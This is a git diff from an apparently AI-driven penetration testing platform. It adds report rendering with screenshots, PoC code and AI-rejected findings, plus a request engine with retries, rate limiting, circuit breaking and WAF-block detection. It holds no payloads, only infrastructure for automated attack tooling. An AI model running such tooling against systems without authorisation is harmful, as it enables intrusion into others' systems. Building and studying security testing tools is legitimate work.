f"{' | CWE: ' + v.cwe_id if v.cwe_id else ''}"
f"{' | CVSS: ' + str(v.cvss_score) if v.cvss_score else ''}"
)
tools_context = ""
if self._tool_executions:
tools_lines = []
for te in self._tool_executions:
tools_lines.append(
f"- {te.get('tool', 'unknown')}: {te.get('command', '')} "
f"({te.get('duration', 0)}s, {te.get('findings_count', 0)} findings)"
)
tools_context = "\n\nTools executed:\n" + "\n".join(tools_lines)
total = len(vulnerabilities)
critical = sum(1 for v in vulnerabilities if v.severity == "critical")
high = sum(1 for v in vulnerabilities if v.severity == "high")
medium = sum(1 for v in vulnerabilities if v.severity == "medium")
low = sum(1 for v in vulnerabilities if v.severity == "low")
prompt = (
f"Write a professional executive summary for a penetration test report.\n"
f"Target: {scan.name}\n"
f"Total findings: {total} (Critical: {critical}, High: {high}, Medium: {medium}, Low: {low})\n\n"
f"Findings:\n" + "\n".join(findings_context[:30]) + tools_context + "\n\n"
f"Write 3-4 paragraphs covering: overall risk posture, key critical findings, "
f"attack surface observations, and prioritized remediation recommendations. "
f"Be specific and reference actual findings. Professional tone."
)
# Generate AI executive summary
try:
llm = LLMManager()
ai_summary = await llm.generate(
prompt,
"You are a senior penetration testing consultant writing a client-facing report."
)
except Exception:
ai_summary = self._generate_executive_summary(scan, vulnerabilities)
# Generate HTML with AI summary
content = self._generate_html(
scan, vulnerabilities, title,
ai_summary, include_poc=True, include_remediation=True
)
report_dir = self.reports_dir / f"report_{timestamp}"
report_dir.mkdir(parents=True, exist_ok=True)
filename = f"report_{timestamp}.html"
file_path = report_dir / filename
file_path.write_text(content)
self._copy_screenshots_to_report(vulnerabilities, report_dir)
return file_path, ai_summary
def _generate_executive_summary(self, scan: Scan, vulnerabilities: List[Vulnerability]) -> str:
"""Generate executive summary text"""
total = len(vulnerabilities)
@@ -110,27 +201,81 @@ Overall Risk Level: {risk_level}
include_remediation: bool
) -> str:
"""Generate HTML report"""
# Count by severity
# Separate confirmed and rejected vulnerabilities
confirmed_vulns = [v for v in vulnerabilities if getattr(v, 'validation_status', 'ai_confirmed') != 'ai_rejected']
rejected_vulns = [v for v in vulnerabilities if getattr(v, 'validation_status', 'ai_confirmed') == 'ai_rejected']
# Count by severity (confirmed only)
severity_counts = {
"critical": sum(1 for v in vulnerabilities if v.severity == "critical"),
"high": sum(1 for v in vulnerabilities if v.severity == "high"),
"medium": sum(1 for v in vulnerabilities if v.severity == "medium"),
"low": sum(1 for v in vulnerabilities if v.severity == "low"),
"info": sum(1 for v in vulnerabilities if v.severity == "info")
"critical": sum(1 for v in confirmed_vulns if v.severity == "critical"),
"high": sum(1 for v in confirmed_vulns if v.severity == "high"),
"medium": sum(1 for v in confirmed_vulns if v.severity == "medium"),
"low": sum(1 for v in confirmed_vulns if v.severity == "low"),
"info": sum(1 for v in confirmed_vulns if v.severity == "info")
}
total = sum(severity_counts.values())
# Generate vulnerability cards
# Sort vulnerabilities by severity (Critical first, Info last)
confirmed_vulns = sorted(
confirmed_vulns,
key=lambda v: self.SEVERITY_ORDER.get(v.severity, 5)
)
rejected_vulns = sorted(
rejected_vulns,
key=lambda v: self.SEVERITY_ORDER.get(v.severity, 5)
)
# Generate vulnerability cards for confirmed findings
vuln_cards = ""
for vuln in vulnerabilities:
for vuln in confirmed_vulns:
color = self.SEVERITY_COLORS.get(vuln.severity, "#6c757d")
poc_section = ""
if include_poc and (vuln.poc_request or vuln.poc_payload):
if include_poc and (vuln.poc_request or vuln.poc_payload or getattr(vuln, 'poc_code', None)):
# Build screenshot HTML if available
screenshots_html = self._build_screenshots_html(vuln)
# Build PoC code section (generated HTML/Python/curl exploitation code)
poc_code_html = ""
poc_code_value = getattr(vuln, 'poc_code', None) or ""
if poc_code_value:
# Determine language for syntax hint
if poc_code_value.strip().startswith("<!DOCTYPE") or poc_code_value.strip().startswith("<html") or poc_code_value.strip().startswith("<!--"):
lang_label = "HTML"
elif poc_code_value.strip().startswith("#!/usr/bin/env python") or "import requests" in poc_code_value:
lang_label = "Python"
elif poc_code_value.strip().startswith("curl ") or poc_code_value.strip().startswith("#"):
lang_label = "Shell/curl"
else:
lang_label = "PoC Code"
poc_code_html = f"""
<div class="ohvr-section">
<h5>Exploitation Code ({lang_label})</h5>
<div class="code-block"><pre>{self._escape_html(poc_code_value[:5000])}</pre></div>
</div>"""
poc_section = f"""
<div class="poc-section">
<h4>Proof of Concept</h4>
{f'<div class="code-block"><pre>{self._escape_html(vuln.poc_payload or "")}</pre></div>' if vuln.poc_payload else ''}
{f'<div class="code-block"><pre>{self._escape_html(vuln.poc_request[:1000] if vuln.poc_request else "")}</pre></div>' if vuln.poc_request else ''}
<div class="ohvr-section">
<h5>Observation</h5>
<p>{self._escape_html(vuln.description or 'Security-relevant behavior detected at the affected endpoint.')}</p>
</div>
<div class="ohvr-section">
<h5>Hypothesis</h5>
<p>The endpoint may be vulnerable to {self._escape_html(vuln.vulnerability_type or 'the identified attack vector')} based on observed behavior.</p>
</div>
<div class="ohvr-section">
<h5>Validation</h5>
{f'<div class="code-block"><pre>{self._escape_html(vuln.poc_payload or "")}</pre></div>' if vuln.poc_payload else ''}
{f'<div class="code-block"><pre>{self._escape_html(vuln.poc_request[:1000] if vuln.poc_request else "")}</pre></div>' if vuln.poc_request else ''}
{screenshots_html}
</div>
{poc_code_html}
<div class="ohvr-section">
<h5>Result</h5>
<p>{self._escape_html(vuln.impact or 'Vulnerability confirmed through the validation steps above.')}</p>
</div>
</div>
"""
@@ -264,6 +409,41 @@ Overall Risk Level: {risk_level}
word-wrap: break-word;
}}
.executive-summary {{ white-space: pre-wrap; }}
.ohvr-section {{
margin: 1rem 0;
padding: 1rem;
background: rgba(0,0,0,0.2);
border-radius: 8px;
}}
.ohvr-section h5 {{
color: var(--accent);
margin-bottom: 0.5rem;
text-transform: uppercase;
font-size: 0.8rem;
letter-spacing: 1px;
}}
.screenshot-grid {{
display: grid;
grid-template-columns: repeat(auto-fit, minmax(300px, 1fr));
gap: 1rem;
margin: 1rem 0;
}}
.screenshot-card {{
border: 1px solid var(--border);
border-radius: 8px;
overflow: hidden;
}}
.screenshot-card img {{
width: 100%;
height: auto;
display: block;
}}
.screenshot-caption {{
padding: 0.5rem;
font-size: 0.8rem;
color: var(--text-secondary);
text-align: center;
}}
.severity-chart {{
display: flex;
height: 30px;
@@ -312,10 +492,16 @@ Overall Risk Level: {risk_level}
</div>''' if executive_summary else ''}
<div class="section">
<h2>Vulnerability Findings</h2>
{vuln_cards if vuln_cards else '<p>No vulnerabilities found.</p>'}
<h2>Vulnerability Findings ({total} Confirmed)</h2>
{vuln_cards if vuln_cards else '<p>No confirmed vulnerabilities found.</p>'}
</div>
{self._build_rejected_findings_section(rejected_vulns)}
{self._build_screenshots_gallery(confirmed_vulns)}
{self._build_tools_section()}
<div class="footer">
<p>Generated by NeuroSploit v3 - AI-Powered Penetration Testing Platform</p>
</div>
@@ -354,10 +540,245 @@ Overall Risk Level: {risk_level}
"info": scan.info_count
}
},
"vulnerabilities": [v.to_dict() for v in vulnerabilities]
"vulnerabilities": [v.to_dict() for v in vulnerabilities if getattr(v, 'validation_status', 'ai_confirmed') != 'ai_rejected'],
"rejected_findings": [v.to_dict() for v in vulnerabilities if getattr(v, 'validation_status', 'ai_confirmed') == 'ai_rejected'],
"tool_executions": self._tool_executions
}
return json.dumps(report, indent=2, default=str)
def _build_screenshots_html(self, vuln) -> str:
"""Build screenshot grid HTML for a vulnerability.
Sources (in order of priority):
1. vuln.screenshots list with base64 data URIs (from agent capture)
2. Filesystem lookup in reports/screenshots/{finding_id}/ (from BrowserValidator)
"""
data_uris = []
# Source 1: base64 screenshots embedded in the vulnerability object
inline_screenshots = getattr(vuln, 'screenshots', None) or []
for ss in inline_screenshots:
if isinstance(ss, str) and ss.startswith("data:image/"):
data_uris.append(ss)
# Source 2: filesystem screenshots (finding_id = md5(vuln_type+url+param)[:8])
# Check scan-scoped path first, then legacy flat path
if not data_uris:
import hashlib
screenshots_base = settings.BASE_DIR / "reports" / "screenshots"
vuln_type = getattr(vuln, 'vulnerability_type', '') or ''
vuln_url = getattr(vuln, 'url', '') or getattr(vuln, 'affected_endpoint', '') or ''
vuln_param = getattr(vuln, 'parameter', '') or getattr(vuln, 'poc_parameter', '') or ''
finding_id = hashlib.md5(f"{vuln_type}{vuln_url}{vuln_param}".encode()).hexdigest()[:8]
# Scan-scoped path: reports/screenshots/{scan_id}/{finding_id}/
finding_dir = None
if self._scan_id:
scan_dir = screenshots_base / self._scan_id / finding_id
if scan_dir.exists():
finding_dir = scan_dir
# Fallback: legacy flat path reports/screenshots/{finding_id}/
if not finding_dir:
legacy_dir = screenshots_base / finding_id
if legacy_dir.exists():
finding_dir = legacy_dir
if finding_dir:
for ss_file in sorted(finding_dir.glob("*.png"))[:5]:
data_uri = self._embed_screenshot(str(ss_file))
if data_uri:
data_uris.append(data_uri)
if not data_uris:
return ""
cards = ""
for i, data_uri in enumerate(data_uris[:5]):
caption = "Evidence Capture" if i == 0 else f"Screenshot {i + 1}"
cards += f"""
<div class="screenshot-card">
<img src="{data_uri}" alt="{caption}" />
<div class="screenshot-caption">{caption}</div>
</div>"""
return f'<div class="screenshot-grid">{cards}</div>'
def _embed_screenshot(self, filepath: str) -> str:
"""Convert a screenshot file to a base64 data URI."""
path = Path(filepath)
if not path.exists():
return ""
try:
with open(path, 'rb') as f:
data = base64.b64encode(f.read()).decode('ascii')
return f"data:image/png;base64,{data}"
except Exception:
return ""
def _copy_screenshots_to_report(self, vulnerabilities: List[Vulnerability], report_dir: Path):
"""Copy vulnerability screenshots into the per-report folder."""
import shutil
import hashlib
screenshots_base = settings.BASE_DIR / "reports" / "screenshots"
screenshots_dest = report_dir / "screenshots"
for vuln in vulnerabilities:
# Use same finding_id as agent: md5(vuln_type+url+param)[:8]
vuln_type = getattr(vuln, 'vulnerability_type', '') or ''
vuln_url = getattr(vuln, 'url', '') or getattr(vuln, 'affected_endpoint', '') or ''
vuln_param = getattr(vuln, 'parameter', '') or getattr(vuln, 'poc_parameter', '') or ''
finding_id = hashlib.md5(f"{vuln_type}{vuln_url}{vuln_param}".encode()).hexdigest()[:8]
# Check scan-scoped path first, then legacy
src_dir = None
if self._scan_id:
scan_src = screenshots_base / self._scan_id / finding_id
if scan_src.exists():
src_dir = scan_src
if not src_dir:
legacy_src = screenshots_base / finding_id
if legacy_src.exists():
src_dir = legacy_src
if src_dir:
dest_dir = screenshots_dest / finding_id
dest_dir.mkdir(parents=True, exist_ok=True)
for ss_file in src_dir.glob("*.png"):
shutil.copy2(ss_file, dest_dir / ss_file.name)
def _build_screenshots_gallery(self, vulnerabilities: List[Vulnerability]) -> str:
"""Build a dedicated Screenshots & Evidence gallery section for the report."""
import hashlib
gallery_items = []
for vuln in vulnerabilities:
vuln_screenshots = []
# Source 1: base64 from DB
inline = getattr(vuln, 'screenshots', None) or []
for ss in inline:
if isinstance(ss, str) and ss.startswith("data:image/"):
vuln_screenshots.append(ss)
# Source 2: filesystem (scan-scoped first, then legacy)
if not vuln_screenshots:
vuln_type = getattr(vuln, 'vulnerability_type', '') or ''
vuln_url = getattr(vuln, 'url', '') or getattr(vuln, 'affected_endpoint', '') or ''
vuln_param = getattr(vuln, 'parameter', '') or getattr(vuln, 'poc_parameter', '') or ''
finding_id = hashlib.md5(f"{vuln_type}{vuln_url}{vuln_param}".encode()).hexdigest()[:8]
screenshots_base = settings.BASE_DIR / "reports" / "screenshots"
finding_dir = None
if self._scan_id:
scan_dir = screenshots_base / self._scan_id / finding_id
if scan_dir.exists():
finding_dir = scan_dir
if not finding_dir:
legacy_dir = screenshots_base / finding_id
if legacy_dir.exists():
finding_dir = legacy_dir
if finding_dir:
for ss_file in sorted(finding_dir.glob("*.png"))[:5]:
data_uri = self._embed_screenshot(str(ss_file))
if data_uri:
vuln_screenshots.append(data_uri)
if vuln_screenshots:
title = self._escape_html(getattr(vuln, 'title', 'Unknown'))
severity = getattr(vuln, 'severity', 'info')
color = self.SEVERITY_COLORS.get(severity, '#6c757d')
images_html = ""
for i, data_uri in enumerate(vuln_screenshots[:5]):
images_html += f"""
<div class="screenshot-card">
<img src="{data_uri}" alt="Evidence {i+1}" />
<div class="screenshot-caption">Evidence {i+1}</div>
</div>"""
gallery_items.append(f"""
<div style="margin-bottom: 1.5rem;">
<h4 style="color: {color}; margin-bottom: 0.5rem;">{title}</h4>
<div class="screenshot-grid">{images_html}</div>
</div>""")
if not gallery_items:
return ""
return f"""
<div class="section">
<h2>Screenshots &amp; Evidence</h2>
<p style="color: var(--text-secondary); margin-bottom: 1rem;">Visual evidence captured during vulnerability validation.</p>
{''.join(gallery_items)}
</div>"""
def _build_rejected_findings_section(self, rejected_vulns: List) -> str:
"""Build an HTML section for AI-rejected findings that need manual review."""
if not rejected_vulns:
return ""
items = ""
for vuln in rejected_vulns:
color = self.SEVERITY_COLORS.get(vuln.severity, "#6c757d")
reason = self._escape_html(getattr(vuln, 'ai_rejection_reason', '') or 'No reason provided')
items += f"""
<div style="border: 1px solid #555; border-left: 3px solid {color}; border-radius: 8px; padding: 12px; margin-bottom: 8px; opacity: 0.7; background: rgba(255,165,0,0.05);">
<div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 8px;">
<div style="display: flex; align-items: center; gap: 8px;">
<span style="background-color: {color}; color: white; padding: 2px 8px; border-radius: 4px; font-size: 0.75rem; font-weight: bold;">{vuln.severity.upper()}</span>
<strong>{self._escape_html(vuln.title)}</strong>
</div>
<span style="background: rgba(255,165,0,0.2); color: #ffa500; padding: 2px 8px; border-radius: 12px; font-size: 0.7rem;">AI Rejected</span>
</div>
<p style="color: #aaa; font-size: 0.85rem; margin: 4px 0;"><strong>Endpoint:</strong> {self._escape_html(vuln.affected_endpoint or 'N/A')}</p>
{f'<p style="color: #aaa; font-size: 0.85rem; margin: 4px 0;"><strong>Payload:</strong> <code>{self._escape_html(vuln.poc_payload or "")}</code></p>' if vuln.poc_payload else ''}
<p style="color: #ffa500; font-size: 0.8rem; margin: 8px 0 0 0; padding: 8px; background: rgba(255,165,0,0.1); border-radius: 4px;"><strong>Rejection Reason:</strong> {reason}</p>
</div>
"""
return f"""
<div class="section" style="border: 1px dashed #ffa500; border-radius: 12px; padding: 20px; margin-top: 20px;">
<h2 style="color: #ffa500;">AI-Rejected Findings ({len(rejected_vulns)}) - Manual Review Required</h2>
<p style="color: var(--text-secondary); margin-bottom: 1rem;">
The following potential findings were rejected by AI analysis as likely false positives.
Manual pentester review is recommended to confirm or override these decisions.
</p>
{items}
</div>"""
def _build_tools_section(self) -> str:
"""Build an HTML section listing tools that were executed during the scan."""
if not self._tool_executions:
return ""
rows = ""
for te in self._tool_executions:
tool = self._escape_html(te.get("tool", "unknown"))
command = self._escape_html(te.get("command", ""))
duration = te.get("duration", 0)
findings = te.get("findings_count", 0)
exit_code = te.get("exit_code", 0)
stdout = self._escape_html(te.get("stdout_preview", "")[:500])
status_color = "#28a745" if exit_code == 0 else "#dc3545"
rows += f"""
<div class="vuln-card" style="margin-bottom: 1rem;">
<div class="vuln-header" style="padding: 15px;">
<span class="severity-badge" style="background-color: #6c63ff; font-size: 0.75em;">{tool.upper()}</span>
<h3 style="font-size: 0.95em;">{command}</h3>
</div>
<div class="vuln-meta">
<span><strong>Duration:</strong> {duration}s</span>
<span><strong>Findings:</strong> {findings}</span>
<span style="color: {status_color};"><strong>Exit:</strong> {exit_code}</span>
</div>
{f'<div style="padding: 15px;"><div class="code-block"><pre>{stdout}</pre></div></div>' if stdout else ''}
</div>"""
return f"""
<div class="section">
<h2>Tools Executed</h2>
<p style="color: var(--text-secondary); margin-bottom: 1rem;">Security tools executed during the automated assessment.</p>
{rows}
</div>"""
def _escape_html(self, text: str) -> str:
"""Escape HTML special characters"""
if not text:
+135 -1
View File
@@ -4,11 +4,12 @@ Generates beautiful, comprehensive security assessment reports
"""
import json
import base64
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Any, Optional
from dataclasses import dataclass
import html
import base64
@dataclass
@@ -455,6 +456,70 @@ class HTMLReportGenerator:
.card {{
animation: fadeIn 0.3s ease;
}}
/* Screenshot grid */
.screenshot-grid {{
display: grid;
grid-template-columns: repeat(auto-fit, minmax(320px, 1fr));
gap: 16px;
margin-top: 12px;
}}
.screenshot-card {{
border: 1px solid {border_color};
border-radius: 8px;
overflow: hidden;
background: {'#0f172a' if is_dark else '#f1f5f9'};
transition: transform 0.2s, box-shadow 0.2s;
}}
.screenshot-card:hover {{
transform: translateY(-2px);
box-shadow: 0 4px 16px rgba(0,0,0,0.3);
}}
.screenshot-card img {{
width: 100%;
height: auto;
display: block;
cursor: pointer;
}}
.screenshot-caption {{
padding: 8px 12px;
font-size: 0.75rem;
color: {text_muted};
text-align: center;
border-top: 1px solid {border_color};
text-transform: uppercase;
letter-spacing: 0.05em;
}}
/* Screenshot modal (fullscreen view) */
.screenshot-modal {{
display: none;
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
background: rgba(0,0,0,0.9);
z-index: 10000;
justify-content: center;
align-items: center;
cursor: pointer;
}}
.screenshot-modal.active {{
display: flex;
}}
.screenshot-modal img {{
max-width: 90%;
max-height: 90%;
border-radius: 8px;
box-shadow: 0 8px 32px rgba(0,0,0,0.5);
}}
</style>"""
def _get_scripts(self) -> str:
@@ -495,6 +560,29 @@ class HTMLReportGenerator:
function printReport() {
window.print();
}
// Screenshot zoom modal
(function() {
var modal = document.createElement('div');
modal.className = 'screenshot-modal';
modal.innerHTML = '<img />';
document.body.appendChild(modal);
document.addEventListener('click', function(e) {
if (e.target.closest('.screenshot-card img')) {
var src = e.target.src;
modal.querySelector('img').src = src;
modal.classList.add('active');
}
if (e.target.closest('.screenshot-modal')) {
modal.classList.remove('active');
}
});
document.addEventListener('keydown', function(e) {
if (e.key === 'Escape') modal.classList.remove('active');
});
})();
</script>"""
def _generate_header(self, session_data: Dict) -> str:
@@ -770,6 +858,7 @@ class HTMLReportGenerator:
<h4>Evidence / Proof of Concept</h4>
<div class="evidence-box">{html.escape(finding.get('evidence', ''))}</div>
</div>''' if finding.get('evidence') else ''}
{self._generate_screenshots_html(finding)}
{f'''<div class="finding-section">
<h4>Impact</h4>
<p>{html.escape(finding.get('impact', ''))}</p>
@@ -852,6 +941,51 @@ class HTMLReportGenerator:
</ul>
</div>'''
def _generate_screenshots_html(self, finding: Dict) -> str:
"""Generate screenshot grid HTML for a finding.
Supports two sources:
1. finding['screenshots'] list with base64 data URIs (from agent capture)
2. Filesystem lookup in reports/screenshots/{finding_id}/ (from BrowserValidator)
"""
screenshots = finding.get('screenshots', [])
# Also check filesystem for screenshots stored by BrowserValidator
finding_id = finding.get('id', '')
if finding_id and not screenshots:
ss_dir = Path('reports/screenshots') / finding_id
if ss_dir.exists():
for ss_file in sorted(ss_dir.glob('*.png'))[:5]:
try:
with open(ss_file, 'rb') as f:
data = base64.b64encode(f.read()).decode('ascii')
screenshots.append(f"data:image/png;base64,{data}")
except Exception:
pass
if not screenshots:
return ''
cards = ''
for i, ss in enumerate(screenshots[:5]): # Cap at 5 screenshots
label = f"Screenshot {i + 1}"
if i == 0:
label = "Evidence Capture"
elif i == 1:
label = "Exploitation Proof"
cards += f'''
<div class="screenshot-card">
<img src="{ss}" alt="{label}" loading="lazy" />
<div class="screenshot-caption">{label}</div>
</div>'''
return f'''
<div class="finding-section">
<h4>Screenshots</h4>
<div class="screenshot-grid">{cards}</div>
</div>'''
def _generate_scan_results(self, scan_results: List[Dict]) -> str:
"""Generate tool scan results section"""
if not scan_results:
+377
View File
@@ -0,0 +1,377 @@
"""
NeuroSploit v3 - Resilient Request Engine
Wraps aiohttp session with retry, rate limiting, circuit breaker,
and error classification for autonomous pentesting.
"""
import asyncio
import logging
import time
from dataclasses import dataclass, field
from enum import Enum
from typing import Callable, Dict, Optional, Any
logger = logging.getLogger(__name__)
class ErrorType(Enum):
SUCCESS = "success"
CLIENT_ERROR = "client_error" # 4xx (not 429)
RATE_LIMITED = "rate_limited" # 429
WAF_BLOCKED = "waf_blocked" # 403 + WAF indicators
SERVER_ERROR = "server_error" # 5xx
TIMEOUT = "timeout"
CONNECTION_ERROR = "connection_error"
@dataclass
class RequestResult:
status: int
body: str
headers: Dict[str, str]
url: str
error_type: ErrorType = ErrorType.SUCCESS
retry_count: int = 0
response_time: float = 0.0
@dataclass
class HostState:
"""Per-host tracking for rate limiting and circuit breaker."""
host: str
request_count: int = 0
error_count: int = 0
consecutive_failures: int = 0
last_request_time: float = 0.0
delay: float = 0.1
circuit_open: bool = False
circuit_open_time: float = 0.0
avg_response_time: float = 0.0
# Adaptive timeout
_response_times: list = field(default_factory=list)
class RequestEngine:
"""Resilient HTTP request engine with retry, rate limiting, and circuit breaker.
Features:
- Error classification (7 types)
- Smart retry with exponential backoff (1s, 2s, 4s) on 5xx/timeout/connection
- No retry on 4xx client errors
- Per-host rate limiting with auto-increase on 429
- Circuit breaker: N consecutive failures → open circuit for cooldown period
- Adaptive timeouts based on target response times
- Request counting and statistics
- Cancel-aware (checks is_cancelled before each request)
"""
WAF_INDICATORS = [
"cloudflare", "incapsula", "sucuri", "akamai", "imperva",
"mod_security", "modsecurity", "request blocked", "access denied",
"waf", "web application firewall", "barracuda", "fortinet",
"f5 big-ip", "citrix", "azure firewall",
]
def __init__(
self,
session, # aiohttp.ClientSession
default_delay: float = 0.1,
max_retries: int = 3,
circuit_threshold: int = 5,
circuit_timeout: float = 30.0,
default_timeout: float = 10.0,
is_cancelled_fn: Optional[Callable] = None,
):
self.session = session
self.default_delay = default_delay
self.max_retries = max_retries
self.circuit_threshold = circuit_threshold
self.circuit_timeout = circuit_timeout
self.default_timeout = default_timeout
self.is_cancelled = is_cancelled_fn or (lambda: False)
# Per-host state
self._hosts: Dict[str, HostState] = {}
# Global stats
self.total_requests = 0
self.total_errors = 0
self.errors_by_type: Dict[str, int] = {e.value: 0 for e in ErrorType}
def _get_host(self, url: str) -> HostState:
"""Get or create host state."""
from urllib.parse import urlparse
host = urlparse(url).netloc
if host not in self._hosts:
self._hosts[host] = HostState(host=host, delay=self.default_delay)
return self._hosts[host]
def _classify_error(self, status: int, body: str, exception: Optional[Exception] = None) -> ErrorType:
"""Classify response/error into ErrorType."""
if exception:
exc_name = type(exception).__name__.lower()
if "timeout" in exc_name or "timedout" in exc_name:
return ErrorType.TIMEOUT
return ErrorType.CONNECTION_ERROR
if 200 <= status < 400:
return ErrorType.SUCCESS
if status == 429:
return ErrorType.RATE_LIMITED
if status == 403:
body_lower = body.lower() if body else ""
if any(w in body_lower for w in self.WAF_INDICATORS):
return ErrorType.WAF_BLOCKED
return ErrorType.CLIENT_ERROR
if 400 <= status < 500:
return ErrorType.CLIENT_ERROR
if status >= 500:
return ErrorType.SERVER_ERROR
return ErrorType.SUCCESS
def _should_retry(self, error_type: ErrorType) -> bool:
"""Determine if this error type warrants retry."""
return error_type in (
ErrorType.SERVER_ERROR,
ErrorType.TIMEOUT,
ErrorType.CONNECTION_ERROR,
ErrorType.RATE_LIMITED,
)
def _get_backoff_delay(self, attempt: int, error_type: ErrorType) -> float:
"""Calculate exponential backoff delay."""
if error_type == ErrorType.RATE_LIMITED:
return min(30.0, 2.0 * (2 ** attempt)) # Longer for rate limiting
return min(10.0, 1.0 * (2 ** attempt)) # 1s, 2s, 4s, ...
def _get_adaptive_timeout(self, host_state: HostState) -> float:
"""Calculate adaptive timeout based on target response history."""
if not host_state._response_times:
return self.default_timeout
avg = sum(host_state._response_times[-20:]) / len(host_state._response_times[-20:])
# 3x average with min 5s, max 30s
return max(5.0, min(30.0, avg * 3.0))
def _check_circuit(self, host_state: HostState) -> bool:
"""Check if circuit breaker allows request. Returns True if allowed."""
if not host_state.circuit_open:
return True
# Check if cooldown has passed
elapsed = time.time() - host_state.circuit_open_time
if elapsed >= self.circuit_timeout:
# Half-open: allow one test request
host_state.circuit_open = False
host_state.consecutive_failures = 0
logger.debug(f"Circuit half-open for {host_state.host}")
return True
return False
def _update_circuit(self, host_state: HostState, error_type: ErrorType):
"""Update circuit breaker state after a request."""
if error_type == ErrorType.SUCCESS:
host_state.consecutive_failures = 0
host_state.circuit_open = False
elif error_type in (ErrorType.SERVER_ERROR, ErrorType.TIMEOUT, ErrorType.CONNECTION_ERROR):
host_state.consecutive_failures += 1
if host_state.consecutive_failures >= self.circuit_threshold:
host_state.circuit_open = True
host_state.circuit_open_time = time.time()
logger.warning(f"Circuit OPEN for {host_state.host} after {host_state.consecutive_failures} failures")
async def request(
self,
url: str,
method: str = "GET",
params: Optional[Dict] = None,
data: Optional[Any] = None,
headers: Optional[Dict] = None,
cookies: Optional[Dict] = None,
allow_redirects: bool = False,
timeout: Optional[float] = None,
json_data: Optional[Dict] = None,
) -> Optional[RequestResult]:
"""Make an HTTP request with retry, rate limiting, and circuit breaker.
Returns RequestResult on success (even 4xx), None on total failure.
"""
if self.is_cancelled():
return None
host_state = self._get_host(url)
# Circuit breaker check
if not self._check_circuit(host_state):
logger.debug(f"Circuit open for {host_state.host}, skipping")
return RequestResult(
status=0, body="", headers={}, url=url,
error_type=ErrorType.CONNECTION_ERROR
)
# Rate limiting: wait per-host delay
now = time.time()
elapsed = now - host_state.last_request_time
if elapsed < host_state.delay:
await asyncio.sleep(host_state.delay - elapsed)
# Determine timeout
req_timeout = timeout or self._get_adaptive_timeout(host_state)
# Retry loop
last_error_type = ErrorType.CONNECTION_ERROR
for attempt in range(self.max_retries + 1):
if self.is_cancelled():
return None
start_time = time.time()
try:
import aiohttp
kwargs = {
"method": method,
"url": url,
"allow_redirects": allow_redirects,
"timeout": aiohttp.ClientTimeout(total=req_timeout),
"ssl": False,
}
if params:
kwargs["params"] = params
if data:
kwargs["data"] = data
if json_data:
kwargs["json"] = json_data
if headers:
kwargs["headers"] = headers
if cookies:
kwargs["cookies"] = cookies
async with self.session.request(**kwargs) as resp:
body = await resp.text()
resp_time = time.time() - start_time
resp_headers = dict(resp.headers)
status = resp.status
# Track response time
host_state._response_times.append(resp_time)
if len(host_state._response_times) > 50:
host_state._response_times = host_state._response_times[-30:]
host_state.avg_response_time = sum(host_state._response_times) / len(host_state._response_times)
# Classify
error_type = self._classify_error(status, body)
last_error_type = error_type
# Update stats
self.total_requests += 1
host_state.request_count += 1
host_state.last_request_time = time.time()
self.errors_by_type[error_type.value] = self.errors_by_type.get(error_type.value, 0) + 1
# Update circuit breaker
self._update_circuit(host_state, error_type)
# Handle rate limiting
if error_type == ErrorType.RATE_LIMITED:
# Check Retry-After header
retry_after = resp_headers.get("Retry-After", "")
if retry_after.isdigit():
wait = min(60.0, float(retry_after))
else:
wait = self._get_backoff_delay(attempt, error_type)
# Increase per-host delay
host_state.delay = min(5.0, host_state.delay * 2)
logger.debug(f"Rate limited on {host_state.host}, delay now {host_state.delay:.1f}s")
if attempt < self.max_retries:
await asyncio.sleep(wait)
continue
# Retry on server errors
if self._should_retry(error_type) and attempt < self.max_retries:
wait = self._get_backoff_delay(attempt, error_type)
logger.debug(f"Retry {attempt+1}/{self.max_retries} for {url} ({error_type.value}), wait {wait:.1f}s")
await asyncio.sleep(wait)
continue
# Return result (success or non-retryable error)
if error_type != ErrorType.SUCCESS:
self.total_errors += 1
host_state.error_count += 1
return RequestResult(
status=status,
body=body,
headers=resp_headers,
url=str(resp.url),
error_type=error_type,
retry_count=attempt,
response_time=resp_time,
)
except asyncio.TimeoutError:
resp_time = time.time() - start_time
last_error_type = ErrorType.TIMEOUT
self.total_requests += 1
self.total_errors += 1
host_state.request_count += 1
host_state.error_count += 1
host_state.last_request_time = time.time()
self.errors_by_type["timeout"] = self.errors_by_type.get("timeout", 0) + 1
self._update_circuit(host_state, ErrorType.TIMEOUT)
if attempt < self.max_retries:
wait = self._get_backoff_delay(attempt, ErrorType.TIMEOUT)
logger.debug(f"Timeout on {url}, retry {attempt+1}/{self.max_retries}")
await asyncio.sleep(wait)
continue
except Exception as e:
resp_time = time.time() - start_time
error_type = self._classify_error(0, "", e)
last_error_type = error_type
self.total_requests += 1
self.total_errors += 1
host_state.request_count += 1
host_state.error_count += 1
host_state.last_request_time = time.time()
self.errors_by_type[error_type.value] = self.errors_by_type.get(error_type.value, 0) + 1
self._update_circuit(host_state, error_type)
if self._should_retry(error_type) and attempt < self.max_retries:
wait = self._get_backoff_delay(attempt, error_type)
logger.debug(f"Error on {url}: {e}, retry {attempt+1}")
await asyncio.sleep(wait)
continue
logger.debug(f"Request failed after {attempt+1} attempts: {url} - {e}")
# All retries exhausted
return RequestResult(
status=0, body="", headers={}, url=url,
error_type=last_error_type, retry_count=self.max_retries,
)
def get_stats(self) -> Dict:
"""Get request statistics."""
host_stats = {}
for host, state in self._hosts.items():
host_stats[host] = {
"requests": state.request_count,
"errors": state.error_count,
"avg_response_time": round(state.avg_response_time, 3),
"delay": round(state.delay, 3),
"circuit_open": state.circuit_open,
"consecutive_failures": state.consecutive_failures,
}
return {
"total_requests": self.total_requests,
"total_errors": self.total_errors,
"errors_by_type": dict(self.errors_by_type),
"hosts": host_stats,
}
def reset_stats(self):
"""Reset all statistics."""
self.total_requests = 0
self.total_errors = 0
self.errors_by_type = {e.value: 0 for e in ErrorType}
self._hosts.clear()
+780
View File
@@ -0,0 +1,780 @@
"""
NeuroSploit v3 - XBOW-Inspired Response Verification Framework
Multi-signal verification system that confirms vulnerabilities
through 4 independent signals, reducing false positives dramatically.
Inspired by XBOW benchmark methodology:
- Binary verification (flag-based in CTF, evidence-based here)
- Health checks before testing
- Baseline diffing for behavioral anomaly detection
- Multi-signal confirmation (2+ signals = confirmed without AI)
"""
import re
import hashlib
from typing import Dict, List, Optional, Tuple, Any
# ---------------------------------------------------------------------------
# Error / indicator patterns used across multiple checkers
